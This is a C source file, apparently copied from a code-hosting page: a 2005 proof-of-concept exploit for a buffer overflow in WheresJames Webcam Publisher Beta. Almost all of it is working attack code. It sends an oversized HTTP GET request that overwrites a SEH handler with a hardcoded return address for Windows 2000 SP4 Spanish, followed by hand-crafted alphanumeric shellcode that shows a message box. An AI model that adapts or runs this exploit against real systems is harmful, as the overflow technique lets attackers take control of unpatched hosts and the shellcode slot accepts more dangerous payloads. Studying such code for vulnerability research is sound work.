171 lines
No EOL
5.7 KiB
C
171 lines
No EOL
5.7 KiB
C
/*
|
|
* WheresJames Webcam Publisher Beta 2.0.0014 POC (www.wheresjames.com)
|
|
*
|
|
*
|
|
* Bug and Exploit by : Miguel Tarascó Acuña - Haxorcitos.com 2005
|
|
* Tarako AT gmail.com - Tarako AT Haxorcitos.com
|
|
*
|
|
* Platforms tested:
|
|
*
|
|
* - Windows 2000 SP4 Spanish
|
|
* - Probably All Windows 2000 versions
|
|
*
|
|
*
|
|
* Exploit Date: 15/April/2005
|
|
*
|
|
*
|
|
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
|
|
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
|
|
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
|
|
*
|
|
* Greetings to: #haxorcitos, #dsr and #localhost @efnet
|
|
*
|
|
*
|
|
* Little Explanation:
|
|
*
|
|
* Buffer must only have bytes between 0x20 and 0x7A, this limits you to use
|
|
* a generic shellcode.
|
|
* I created a harcoded MessageBoxA alphanumeric Shellcode to run with this POC
|
|
* Also the offset referenced by the Call ECX SEH handler overwriten, must contain
|
|
* only bytes between 0x20 and 0x7A
|
|
*
|
|
* 77F69B9F 8B4D 18 MOV ECX,DWORD PTR SS:[EBP+18]
|
|
* 77F69BA2 FFD1 CALL ECX
|
|
*
|
|
* stack
|
|
* 00000000
|
|
* 00000000
|
|
* XXXXXXXX <-- EBX points to HERE (XX >= 0x20 && XX <= 0x7A)
|
|
* YYYYYYYY <-- This DWORD overwrites the SEH handler (the flow is taken in the CALL ECX)
|
|
* 00000000
|
|
* 00000000
|
|
*
|
|
*/
|
|
|
|
#include <winsock2.h>
|
|
#include <stdio.h>
|
|
|
|
#pragma comment (lib,"ws2_32")
|
|
|
|
#define TIMEOUT 1
|
|
#define TOPHEADER "GET "
|
|
#define MIDDLEHEADER "\nHost: "
|
|
#define BOTTOMHEADER "\nUser-Agent: User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0)\n\
|
|
Accept: */*\n\
|
|
Accept-Language: es\n\
|
|
Accept-Encoding: gzip,deflate\n\
|
|
Keep-Alive: 100\n\
|
|
Connection: keep-alive\r\n\r\n"
|
|
#define BUFFERLEN 5000
|
|
|
|
|
|
char shellcode[] = // little harcoded alphanumeric "shellcode"
|
|
// haaaaX5aaaaP[H-,F3T--F3U5!@z!ShkitohTaraTZSSRSSPÃ
|
|
"\x68\x61\x61\x61\x61" // PUSH 61616161 ;
|
|
"\x58" // POP EAX ; EAX = 61616161
|
|
"\x35\x61\x61\x61\x61" // XOR EAX,61616161 ; EAX = 00000000
|
|
"\x50" // PUSH EAX ;
|
|
"\x5B" // POP EBX ; EBX = 00000000
|
|
"\x48" // DEC EAX ; EAX = FFFFFFFF
|
|
"\x2D\x2C\x46\x33\x54" // SUB EAX,5433462C ; EAX = ABCCB9D3
|
|
"\x2D\x2D\x46\x33\x55" // SUB EAX,5533462D ; EAX = 569973A6
|
|
"\x35\x21\x40\x7A\x21" // XOR EAX,217A4021 ; EAX = 77E33387 USER32.MessageBoxA (Win2kSP4)
|
|
"\x53" // PUSH EBX ;
|
|
"\x68\x6B\x69\x74\x6F" // PUSH 6F74696B ; ASCII "kito"
|
|
"\x68\x54\x61\x72\x61" // PUSH 61726154 ; ASCII "Tara"
|
|
"\x54" // PUSH ESP ;
|
|
"\x5A" // POP EDX ; ASCII "Tarakito"
|
|
"\x53" // PUSH EBX ; 0
|
|
"\x53" // PUSH EBX ; 0
|
|
"\x52" // PUSH EDX ; Tarakito
|
|
"\x53" // PUSH EBX ; 0
|
|
"\x53" // PUSH EBX ; 0
|
|
"\x50" // PUSH EAX ; MessageBoxA
|
|
"\xC3"; // RETN
|
|
|
|
|
|
struct { char *name; long offset; } supported[] = {
|
|
// 0x72712F5E (clbcatq.dll 2000.2.3511.0) -> 83C108 = ADD ECX,8 + FFD1 = CALL ECX
|
|
{"Windows 2000 Pro SP4 Spanish", 0x72712F5E },
|
|
{"Crash", 0x41414141 }
|
|
},VERSIONES;
|
|
|
|
|
|
/******************************************************************************/
|
|
void ShowHeader(int argc,char *argv[]) {
|
|
int i;
|
|
printf("\n WheresJames Webcam Publisher Beta 2.0.0014 Buffer Overflow POC\n");
|
|
printf(" Exploit by Miguel Tarasco - Tarako [at] gmail [dot] com\n");
|
|
|
|
printf("\n Windows Versions:\n");
|
|
printf(" ---------------------------------------------\n");
|
|
for (i=0;i<sizeof(supported)/sizeof(VERSIONES);i++) {
|
|
printf(" %d) %s (0x%08x)\n",i,supported[i].name,supported[i].offset);
|
|
}
|
|
printf(" ---------------------------------------------\n\n");
|
|
if (argc<4) {
|
|
printf(" Usage: %s <IP> <Port> <Option>\n",argv[0]);
|
|
exit(1);
|
|
exit(1);
|
|
}
|
|
}
|
|
/******************************************************************************/
|
|
|
|
void main(int argc, char *argv[]) {
|
|
SOCKET s;
|
|
|
|
WSADATA HWSAdata;
|
|
struct sockaddr_in sa;
|
|
|
|
char *buffer=NULL;
|
|
|
|
ShowHeader(argc,argv);
|
|
|
|
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) {
|
|
printf("\n [e] Error: WSAStartup():%d\n", WSAGetLastError());
|
|
exit(1);
|
|
}
|
|
|
|
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){
|
|
printf("\n [e] Error: socket():%d\n", WSAGetLastError());
|
|
exit(1);
|
|
}
|
|
|
|
sa.sin_family = AF_INET;
|
|
sa.sin_port = (USHORT)htons(atoi(argv[2]));
|
|
sa.sin_addr.S_un.S_addr = inet_addr(argv[1]);
|
|
|
|
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
|
|
printf("\n [e] Error: connect()");
|
|
exit(1);
|
|
}
|
|
|
|
printf(" [i] Connected : Yes\n");
|
|
printf(" [i] Target : %s\n",supported[atoi(argv[3])].name);
|
|
|
|
buffer=(char*)malloc(strlen(TOPHEADER)+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+1+strlen(argv[2])+strlen(BOTTOMHEADER)+1);
|
|
memset(buffer,0,sizeof(buffer));
|
|
|
|
memcpy(buffer,TOPHEADER,strlen(TOPHEADER));
|
|
|
|
memset(buffer+strlen(TOPHEADER),'A',BUFFERLEN);
|
|
|
|
memcpy(buffer+strlen(TOPHEADER)+1052,&supported[atoi(argv[3])].offset,sizeof(long));
|
|
|
|
memcpy(buffer+strlen(TOPHEADER)+1060,shellcode,strlen(shellcode));
|
|
|
|
memcpy(buffer+BUFFERLEN,MIDDLEHEADER,strlen(MIDDLEHEADER));
|
|
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER),argv[1],strlen(argv[1]));
|
|
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1]),":",strlen(":"));
|
|
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":"),argv[2],strlen(argv[2]));
|
|
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":")+strlen(argv[2]),BOTTOMHEADER,strlen(BOTTOMHEADER));
|
|
|
|
send(s,buffer,strlen(buffer),0);
|
|
|
|
printf(" [i] Buffer sent\n\n");
|
|
|
|
closesocket(s);
|
|
|
|
}
|
|
|
|
// milw0rm.com [2005-04-18]
|